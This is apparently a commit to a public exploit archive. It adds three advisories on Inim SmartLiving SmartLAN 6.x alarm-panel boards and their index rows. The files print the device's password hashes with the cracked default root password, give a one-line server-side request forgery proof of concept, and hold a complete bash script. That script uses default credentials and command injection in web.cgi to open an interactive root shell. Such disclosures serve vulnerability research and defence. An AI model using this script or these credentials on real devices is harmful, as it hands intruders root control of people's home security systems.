DB: 2019-12-11

3 changes to exploits/shellcodes Inim Electronics Smartliving SmartLAN 6.x - Hard-coded Credentials Inim Electronics Smartliving SmartLAN 6.x - Unauthenticated Server-Side Request Forgery Inim Electronics Smartliving SmartLAN 6.x - Remote Command Execution
2019-12-11 05:01:56 +00:00 · 2019-12-11 05:01:56 +00:00 · 09d5da74fb
commit 09d5da74fb
parent 44b163c8d1
4 changed files with 346 additions and 0 deletions
--- a/exploits/hardware/local/47763.txt
+++ b/exploits/hardware/local/47763.txt
@ -0,0 +1,79 @@
+# Exploit Title: Inim Electronics Smartliving SmartLAN 6.x - Hard-coded Credentials
+# Exploit Author: LiquidWorm
+# Date: 2019-12-09
+# Product web page: https://www.inim.biz
+# Link: https://www.inim.biz/en/antintrusion-control-panels/home-automation/control-panel-smartliving?  
+# Advisory ID: ZSL-2019-5546
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5546.php
+
+Inim Electronics Smartliving SmartLAN/G/SI <=6.x Hard-coded Credentials
+
+
+Vendor: INIM Electronics s.r.l.
+Product web page: https://www.inim.biz
+Link: https://www.inim.biz/en/antintrusion-control-panels/home-automation/control-panel-smartliving?
+Affected version: <=6.x
+Affected models: SmartLiving 505
+                 SmartLiving 515
+                 SmartLiving 1050, SmartLiving 1050/G3
+                 SmartLiving 10100L, SmartLiving10100L/G3
+
+Summary: SmartLiving anti-intrusion control panel and security system provides
+important features rarely found in residential, commercial or industrial application
+systems of its kind. This optimized-performance control panel provides first-rate
+features such as: graphic display, text-to-speech, voice notifier, flexible hardware,
+end-to-end voice transmission (voice-on-bus), IP connectivity.
+
+SMARTLAN/SI:
+The system-on-chip platform used in the SmartLAN/SI accessory board provides point-to-point
+networking capability and fast connectivity to the Internet. Therefore, it is possible
+to set up a remote connection and program or control the system via the SmartLeague
+software application. In effect, the SmartLAN/SI board grants the same level of access
+to the system as a local RS232 connection.
+
+SMARTLAN/G:
+The SmartLAN/G board operates in the same way as the SmartLAN/SI but in addition provides
+advanced remote-access and communication functions. The SmartLAN/G board is capable of
+sending event-related e-mails automatically. Each e-mail can be associated with a subject,
+an attachment and a text message. The attachment can be of any kind and is saved to an
+SD card. The message text can contain direct links to domains or IP addressable devices,
+such as a security cameras. In addition to e-mails, the SmartLAN/G board offers users
+global access to their control panels via any Internet browser accessed through a PC,
+PDA or Smartphone. In fact, the SmartLAN/G has an integrated web-server capable of
+distinguishing the means of connection and as a result provides an appropriate web-page
+for the tool in use. Smartphones can control the system in much the same way as a
+household keypad, from inside the house or from any part of the world.
+
+Desc: The devices utilizes hard-coded credentials within its Linux distribution image.
+These sets of credentials (Telnet, SSH, FTP) are never exposed to the end-user and cannot
+be changed through any normal operation of the smart home device. Attacker could exploit
+this vulnerability by logging in and gain system access.
+
+Tested on: GNU/Linux 3.2.1 armv5tejl
+           Boa/0.94.14rc21
+           BusyBox v1.20.2
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2019-5546
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5546.php
+
+
+06.09.2019
+
+--
+
+
+# cat /etc/passwd
+root:$1$$uqbusDeGY2YWqg.T2S1100:0:0:administrator:/:/bin/sh
+nobody:*:254:254:nobody:/var/empty:/bin/sh
+logout:gfr8cijmRSDck:498:506:logout:/:
+
+# john --show /etc/passwd 
+root:pass:0:0:administrator:/:/bin/sh
+logout:logout:498:506:logout:/:
+
+2 password hashes cracked, 0 left
--- a/exploits/hardware/webapps/47764.txt
+++ b/exploits/hardware/webapps/47764.txt
@ -0,0 +1,72 @@
+# Exploit Title: Inim Electronics Smartliving SmartLAN 6.x - Unauthenticated Server-Side Request Forgery
+# Author: LiquidWorm
+# Date: 2019-12-09
+# Product web page: https://www.inim.biz
+# Link: https://www.inim.biz/en/antintrusion-control-panels/home-automation/control-panel-smartliving?
+# Version: 6.x
+# Advisory ID: ZSL-2019-5545
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5545.php
+
+Inim Electronics Smartliving SmartLAN/G/SI <=6.x Unauthenticated SSRF
+
+
+Vendor: INIM Electronics s.r.l.
+Product web page: https://www.inim.biz
+Link: https://www.inim.biz/en/antintrusion-control-panels/home-automation/control-panel-smartliving?
+Affected version: <=6.x
+Affected models: SmartLiving 505
+                 SmartLiving 515
+                 SmartLiving 1050, SmartLiving 1050/G3
+                 SmartLiving 10100L, SmartLiving10100L/G3
+
+Summary: SmartLiving anti-intrusion control panel and security system provides
+important features rarely found in residential, commercial or industrial application
+systems of its kind. This optimized-performance control panel provides first-rate
+features such as: graphic display, text-to-speech, voice notifier, flexible hardware,
+end-to-end voice transmission (voice-on-bus), IP connectivity.
+
+SMARTLAN/SI:
+The system-on-chip platform used in the SmartLAN/SI accessory board provides point-to-point
+networking capability and fast connectivity to the Internet. Therefore, it is possible
+to set up a remote connection and program or control the system via the SmartLeague
+software application. In effect, the SmartLAN/SI board grants the same level of access
+to the system as a local RS232 connection.
+
+SMARTLAN/G:
+The SmartLAN/G board operates in the same way as the SmartLAN/SI but in addition provides
+advanced remote-access and communication functions. The SmartLAN/G board is capable of
+sending event-related e-mails automatically. Each e-mail can be associated with a subject,
+an attachment and a text message. The attachment can be of any kind and is saved to an
+SD card. The message text can contain direct links to domains or IP addressable devices,
+such as a security cameras. In addition to e-mails, the SmartLAN/G board offers users
+global access to their control panels via any Internet browser accessed through a PC,
+PDA or Smartphone. In fact, the SmartLAN/G has an integrated web-server capable of
+distinguishing the means of connection and as a result provides an appropriate web-page
+for the tool in use. Smartphones can control the system in much the same way as a
+household keypad, from inside the house or from any part of the world.
+
+Desc: Unauthenticated Server-Side Request Forgery (SSRF) vulnerability exists in the
+SmartLiving SmartLAN within the GetImage functionality. The application parses user
+supplied data in the GET parameter 'host' to construct an image request to the service
+through onvif.cgi. Since no validation is carried out on the parameter, an attacker
+can specify an external domain and force the application to make an HTTP request to
+an arbitrary destination host. This can be used by an external attacker for example
+to bypass firewalls and initiate a service and network enumeration on the internal
+network through the affected application.
+
+Tested on: GNU/Linux 3.2.1 armv5tejl
+           Boa/0.94.14rc21
+           BusyBox v1.20.2
+
+
+Vulnerability discovered by Sipke Mellema
+                            @zeroscience
+
+
+Advisory ID: ZSL-2019-5545
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5545.php
+
+
+PoC:
+
+curl http://192.168.1.17/cgi-bin/onvif.cgi -X POST -d"mod=GetImage&host=http://127.0.0.1:23&par=2"
--- a/exploits/hardware/webapps/47765.txt
+++ b/exploits/hardware/webapps/47765.txt
@ -0,0 +1,192 @@
+# Exploit Title: Inim Electronics Smartliving SmartLAN 6.x - Remote Command Execution
+# Author: LiquidWorm
+# Date: 2019-12-09
+# Product web page: https://www.inim.biz
+# Link: https://www.inim.biz/en/antintrusion-control-panels/home-automation/control-panel-smartliving?
+# Version: 6.x
+# Advisory ID: ZSL-2019-5545
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5545.php
+
+#!/bin/bash
+#
+#
+# Inim Electronics SmartLiving SmartLAN/G/SI <=6.x Root Remote Command Execution
+#
+#
+# Vendor: INIM Electronics s.r.l.
+# Product web page: https://www.inim.biz
+# Link: https://www.inim.biz/en/antintrusion-control-panels/home-automation/control-panel-smartliving?
+# Affected version: <=6.x
+# Affected models: SmartLiving 505
+#                  SmartLiving 515
+#                  SmartLiving 1050, SmartLiving 1050/G3
+#                  SmartLiving 10100L, SmartLiving10100L/G3
+#
+# Summary: SmartLiving anti-intrusion control panel and security system provides
+# important features rarely found in residential, commercial or industrial application
+# systems of its kind. This optimized-performance control panel provides first-rate
+# features such as: graphic display, text-to-speech, voice notifier, flexible hardware,
+# end-to-end voice transmission (voice-on-bus), IP connectivity.
+#
+# SMARTLAN/SI:
+# The system-on-chip platform used in the SmartLAN/SI accessory board provides point-to-point
+# networking capability and fast connectivity to the Internet. Therefore, it is possible
+# to set up a remote connection and program or control the system via the SmartLeague
+# software application. In effect, the SmartLAN/SI board grants the same level of access
+# to the system as a local RS232 connection.
+#
+# SMARTLAN/G:
+# The SmartLAN/G board operates in the same way as the SmartLAN/SI but in addition provides
+# advanced remote-access and communication functions. The SmartLAN/G board is capable of
+# sending event-related e-mails automatically. Each e-mail can be associated with a subject,
+# an attachment and a text message. The attachment can be of any kind and is saved to an
+# SD card. The message text can contain direct links to domains or IP addressable devices,
+# such as a security cameras. In addition to e-mails, the SmartLAN/G board offers users
+# global access to their control panels via any Internet browser accessed through a PC,
+# PDA or Smartphone. In fact, the SmartLAN/G has an integrated web-server capable of
+# distinguishing the means of connection and as a result provides an appropriate web-page
+# for the tool in use. Smartphones can control the system in much the same way as a
+# household keypad, from inside the house or from any part of the world.
+#
+# Desc: SmartLiving SmartLAN suffers from an authenticated remote command injection vulnerability.
+# The issue exist due to the 'par' POST parameter not being sanitized when called with
+# the 'testemail' module through web.cgi binary. The vulnerable CGI binary (ELF 32-bit
+# LSB executable, ARM) is calling the 'sh' executable via the system() function to issue
+# a command using the mailx service and its vulnerable string format parameter allowing
+# for OS command injection with root privileges. An attacker can remotely execute system
+# commands as the root user using default credentials and bypass access controls in place.
+#
+# ================= dissassembly of vuln function =================
+#
+#[0x0000c86c]> pd @ 0x000c86c
+#| ;-- pc:
+#| ;-- r15:
+#| 0x0000c86c    ldr r1, str.testemail       ; [0xed96:4]=0x74736574 ; "testemail" ; const char * s2
+#| 0x0000c870    bl sym.imp.strcmp           ; int strcmp(const char *s1, const char *s2)
+#| 0x0000c874    cmp r0, 0
+#| 0x0000c878    bne 0xc8b8
+#| 0x0000c87c    cmp sl, 0
+#| 0x0000c880    beq 0xd148
+#| 0x0000c884    bl sym.set_no_cache
+#| 0x0000c888    add r5, sp, 0x20
+#| 0x0000c88c    mov r0, r4
+#| 0x0000c890    ldr r1, str.application_json ; [0xeda0:4]=0x6c707061 ; "application/json"
+#| 0x0000c894    bl sym.imp.qcgires_setcontenttype
+#| 0x0000c898    mov r0, r5                  ; char *s
+#| 0x0000c89c    mov r1, 0xc8                ; 200 ; size_t
+#| 0x0000c8a0    ldr r2, str.echo__Hello_____mailx__s__Email_test___s ; [0xedb1:4]=0x6f686365 ; "echo \"Hello!\" | mailx -s \"Email test\" %s" ; con
+#| 0x0000c8a4    mov r3, r8                  ; ...
+#| 0x0000c8a8    bl sym.imp.snprintf         ; int snprintf(char *s,
+#| 0x0000c8ac    mov r0, r5                  ; const char * string
+#| 0x0000c8b0    bl sym.imp.system           ; int system(const char *string)
+#| 0x0000c8b4    b 0xd134
+#|
+#| system() @0x0000c8b0 arguments: "sh -c echo "Hello!" | mailx -s "Email test" %s"
+#| Trigger suggest: $(curl -sik http://192.168.1.17/cgi-bin/web.cgi -X POST --data "mod=testemail&par=;/sbin/ifconfig" --cookie "user=admin;pass=pass;code=9999")
+#| Process: 1351 root       0:00 sh -c echo "Hello!" | mailx -s "Emaiil test" ;/sbin/ifconfig
+#|__
+# =================================================================
+#
+# -----------------------------------------------------------------
+#
+# root@kali:~# ./xpl.sh https://192.168.1.17
+# 
+# Checking target: https://192.168.1.17
+# ACCESS GRANTED!
+# 
+# root@ssl> id; uname -a; getconf LONG_BIT; cat ../version.html; pwd
+# uid=0(root) gid=0(root) groups=0(root),10(wheel)
+# Linux SmartLAN 3.2.1 #195 PREEMPT Thu May 30 15:26:27 CEST 2013 armv5tejl GNU/Linux
+# 32
+# <!-- SLF6.07 10100 -->
+# <html><body><h2>
+# SmartLiving 6.07 10100
+# <br><br>SmartLAN/G v. 6.11
+# /www/cgi-bin
+# root@ssl> exit
+# root@kali:~/# 
+#
+# -----------------------------------------------------------------
+#
+# Tested on: GNU/Linux 3.2.1 armv5tejl
+#            Boa/0.94.14rc21
+#            BusyBox v1.20.2
+#
+#
+# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+#                             @zeroscience
+#
+#
+# Advisory ID: ZSL-2019-5544
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5544.php
+#
+#
+# 06.09.2019
+#
+
+URL=$1
+CGI="/cgi-bin/web.cgi"
+COOK="user=admin;pass=pass;code=9999"
+COOK1="user=admin;pass=pass;code=9998"
+COOK2="user=user;pass=pass;code=0001"
+PARAMS="mod=testemail&par=;"
+CHECK=${URL:4:1}
+
+if [ "$#" -ne 1 ]; then
+	echo -en "\e[34m"
+	echo "==============================================="
+	echo " SmartLiving  SmartLAN 6.x Remote Root Exploit"
+	echo -e "\t\tZSL-2019-5544"
+	echo "==============================================="
+	echo -en "\e[00m"
+	echo -e "\nUsage: $0 http(s)://ip:port\n"
+    exit 0
+fi
+
+echo -ne "\nChecking target: $URL\n"
+
+if [ "$CHECK" == "s" ]; then
+	TEST=$(curl -sIk $URL 2>/dev/null | head -1 | awk -F" " '{print $2}')
+	if [[ "$?" = "7" ]] || [[ $TEST != "200" ]]; then
+		echo "HTTPS with error!"
+		exit 0
+	fi
+	if curl -sik -X POST "$URL$CGI" -H "Cookie: $COOK" -d"${PARAMS}id" | grep uid 1>/dev/null
+	then
+		echo -e "ACCESS GRANTED!\n"
+	else
+		echo "Invalid credentials."
+		exit 0
+	fi
+	while true; do
+		R="$(tput sgr0)"
+		S="$(tput setaf 2)"
+		read -rp "${S}root@ssl>${R} " CMD
+		if [[ "$CMD" == "exit" ]]; then
+			exit 0
+		fi
+		curl -sik -X POST "$URL$CGI" -H "Cookie: $COOK" -d"$PARAMS${CMD}" | awk "/Connection: close/{j=1;next}j" | head -n -5 
+	done
+else
+	TEST=$(curl -sI $URL 2>/dev/null | head -1 | awk -F" " '{print $2}')
+	if [[ "$?" = "7" ]] || [[ $TEST != "200" ]]; then
+		echo "HTTP with error!"
+		exit 0
+	fi
+	if curl -si -X POST "$URL$CGI" -H "Cookie: $COOK" -d"${PARAMS}id" | grep uid 1>/dev/null
+	then
+		echo -e "ACCESS GRANTED!\n"
+	else
+		echo "Invalid credentials."
+		exit 0
+	fi
+	while true; do
+		R="$(tput sgr0)"
+		S="$(tput setaf 2)"
+		read -rp "${S}root@http>${R} " CMD
+		if [[ "$CMD" == "exit" ]]; then
+			exit 0
+		fi
+		curl -si -X POST "$URL$CGI" -H "Cookie: $COOK" -d"$PARAMS${CMD}" | awk "/Connection: close/{j=1;next}j" | head -n -5
+	done
+fi
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -10834,6 +10834,7 @@ id,file,description,date,author,type,platform,port
 47754,exploits/windows/local/47754.py,"Microsoft Windows - 'WSReset' UAC Protection Bypass (Registry)",2019-09-02,valen,local,windows,
 47755,exploits/windows/local/47755.c,"Microsoft Windows 10 - 'WSReset' UAC Protection Bypass (propsys.dll)",2019-09-20,valen,local,windows,
 47759,exploits/windows/local/47759.py,"SpotAuditor 5.3.2 - 'Base64' Local Buffer Overflow (SEH)",2019-12-09,"Kirill Nikolaev",local,windows,
+47763,exploits/hardware/local/47763.txt,"Inim Electronics Smartliving SmartLAN 6.x - Hard-coded Credentials",2019-12-10,LiquidWorm,local,hardware,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -42072,3 +42073,5 @@ id,file,description,date,author,type,platform,port
 47760,exploits/hardware/webapps/47760.py,"Yachtcontrol Webapplication 1.0 - Unauthenticated Remote Code Execution",2019-12-09,Hodorsec,webapps,hardware,
 47761,exploits/php/webapps/47761.py,"Alcatel-Lucent Omnivista 8770 - Remote Code Execution",2019-12-09,0x1911,webapps,php,
 47762,exploits/java/webapps/47762.txt,"Oracle Siebel Sales 8.1 - Persistent Cross-Site Scripting",2019-12-09,omurugur,webapps,java,
+47764,exploits/hardware/webapps/47764.txt,"Inim Electronics Smartliving SmartLAN 6.x - Unauthenticated Server-Side Request Forgery",2019-12-10,LiquidWorm,webapps,hardware,
+47765,exploits/hardware/webapps/47765.txt,"Inim Electronics Smartliving SmartLAN 6.x - Remote Command Execution",2019-12-10,LiquidWorm,webapps,hardware,